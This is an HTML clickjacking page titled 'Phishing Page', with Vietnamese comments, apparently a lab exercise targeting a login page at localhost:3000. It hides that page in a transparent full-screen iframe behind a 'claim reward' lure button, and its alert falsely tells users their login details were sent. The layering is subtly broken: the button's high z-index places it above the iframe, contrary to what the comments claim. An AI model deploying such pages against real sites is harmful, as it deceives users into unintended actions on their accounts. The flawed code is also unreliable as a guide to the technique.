<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Phishing Page</title>
    <style>
        /* Đặt iframe vị trí ẩn để người dùng không thể nhìn thấy */
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            opacity: 0;
        }

        /* Tạo nút bấm giả mạo */
        .fake-button {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            padding: 20px;
            background-color: #4CAF50;
            color: white;
            font-size: 20px;
            border: none;
            cursor: pointer;
            z-index: 9999;
        }
    </style>
</head>
<body>

<h1 style="text-align: center;">Nhận Thưởng Ngay!</h1>
<button class="fake-button" onclick="fakeButtonClick()">Nhận Thưởng</button>

<!-- Nhúng iframe trang đăng nhập thật -->
<iframe src="http://localhost:3000/" name="login-frame"></iframe>

<script>
    function fakeButtonClick() {
        // Chức năng giả mạo khi nhấn nút, người dùng thực tế nhấn vào vị trí của iframe
        alert("Bạn đã nhận thưởng! Thông tin đăng nhập của bạn đã được gửi.");
    }
</script>

</body>
</html>
